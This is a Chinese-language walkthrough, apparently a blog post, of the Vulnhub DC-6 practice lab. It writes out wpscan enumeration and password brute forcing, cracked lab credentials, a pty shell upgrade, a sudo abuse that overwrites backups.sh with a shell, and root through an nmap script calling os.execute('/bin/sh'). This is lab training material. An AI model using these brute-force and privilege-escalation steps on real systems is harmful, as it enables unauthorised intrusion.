title: Vulnhub靶机DC系列-DC6
abbrlink: 331d7522
date: 2022-09-12 11:24:26
tags: Vulnhub

靶场简介

  • Name: DC: 6
  • Date release: 26 Apr 2019
  • Author: DCAU
  • Series: DC

描述

DC-6 是另一个特意建造的易受攻击的实验室,旨在获得渗透测试领域的经验。

这不是一个过于困难的挑战,因此对初学者来说应该很棒。

这一挑战的最终目标是获得根并阅读唯一的标志。

必须具备 Linux 技能和熟悉 Linux 命令行,以及一些基本渗透测试工具的经验。

对于初学者来说,谷歌可以提供很大的帮助,但你可以随时在@DCAU7 上给我发推文,寻求帮助,让你重新开始。但请注意:我不会给你答案,相反,我会给你一个关于如何前进的想法。

技术信息

DC-6 是基于 Debian 64 位构建的 VirtualBox VM,但在大多数 PC 上运行它应该没有任何问题。

我已经在 VMWare Player 上对此进行了测试,但如果在 VMware 中运行此 VM 有任何问题,请通读此内容。

它当前配置为桥接网络,但是,可以根据您的要求进行更改。网络配置为 DHCP。

安装很简单 - 下载它,解压缩,然后将它导入 VirtualBox 或 VMWare,然后就可以了。

注意:您需要在您的渗透测试设备上编辑您的主机文件,以便它读取如下内容:

192.168.0.142 wordy

注意:我以 192.168.0.142 为例。您需要使用常规方法来确定 VM 的 IP 地址,并进行相应调整。

这个非常重要。

是的,它是另一个基于 WordPress 的虚拟机(虽然只是我的第二个)。

重要的

虽然使用此 VM 应该没有问题,但通过下载它,您将对此 VM 可能造成的任何意外损坏承担全部责任。

这么说应该没什么问题,但我觉得有必要把它扔在那里以防万一。

接触

我也很想听听人们如何解决这些挑战,所以如果你准备写一个演练,请这样做并给我一个链接,或者,在 Twitter 上关注我,然后给我发消息(你可以如果您愿意,请在您给我 DM 后取消关注)。

可以通过 Twitter 联系我 - @DCAU7

线索

好吧,这并不是一个真正的线索,但对于那些只想继续工作的人来说,更多的是一些“我们不想花五年时间等待某个过程完成”的建议。

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt 这应该可以为您节省几年时间。;-)

基本信息

image-20220912091433607

kali 192.168.169.220
dc-6 192.168.169.232

根据描述修改 host

格式

192.168.169.232  wordy

kali linux

vim /etc/hosts

image-20220912092217947

windows

C:\Windows\System32\drivers\etc

image-20220912092114047

扫描目标ip

image-20220912092347729

  • ssh 和 http
  • 访问

image-20220912092509308

开扫

wpscan --url http://wordy/ -e
  • 找到用户

image-20220912093546822

  • 把这些用户名 user.txt 保存

  • 根据上面的线索,作者给出爆破的字典

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

image-20220912093909278

image-20220912094432887

  • 在rockyou.txt中查找包含k01的字符串,并写入文件passwords.txt

image-20220912094545093

爆破

wpscan --url http://wordy -U user.txt -P passwords.txt

image-20220912095337051


Username: mark
Password: helpdesk01
  • 登录后台
http://wordy/wp-login.php?

image-20220912095507386

  • 找到一个 输入框 可以执行命令,需要修改一下长度限制

image-20220912100136064

  • 搜索可以利用的漏洞

image-20220912102402561

image-20220912102548488

  • 运行脚本 根据提示 填入相应的信息

image-20220912102748313

  • 交互式shell 直接停止运行 放弃

另一个脚本

image-20220912104612782

  • 修改文件

image-20220912104815778

image-20220912105046646

  • 保存打开并且监听端口

image-20220912105337056

  • 监听成功
python -c 'import pty; pty.spawn("/bin/bash")'

image-20220912105437350

提权

image-20220912105613153

  • 找到
graham 
GSo7isUM1D4

ssh

image-20220912105912287

  • ssh 登陆成功

查看权限

image-20220912110019034

image-20220912110253508

  • graham用户可以修改/home/jens/backups.sh文件。

  • 用echo命令改写/home/jens/backups.sh的内容

echo "/bin/bash" > backups.sh
  • 用jens的身份执行,得到jens的shell
sudo -u jens /home/jens/backups.sh

image-20220912110526604

  • 查看jens可以sudo执行的命令,发现其可以以root的身份执行nmap命令

image-20220912110602968

  • 找可以利用的 (没成功)

image-20220912111352884

image-20220912111532605

  • 另一种方法

nmap工具是可以执行脚本的,那么我们把弹root用户shell的命令写入到nmap的脚本里面,然后用nmap命令执行即可切换到root用户的shell。命令:

echo 'os.execute("/bin/sh")' > getShell
sudo  nmap  --script=getShell

image-20220912112254947

结束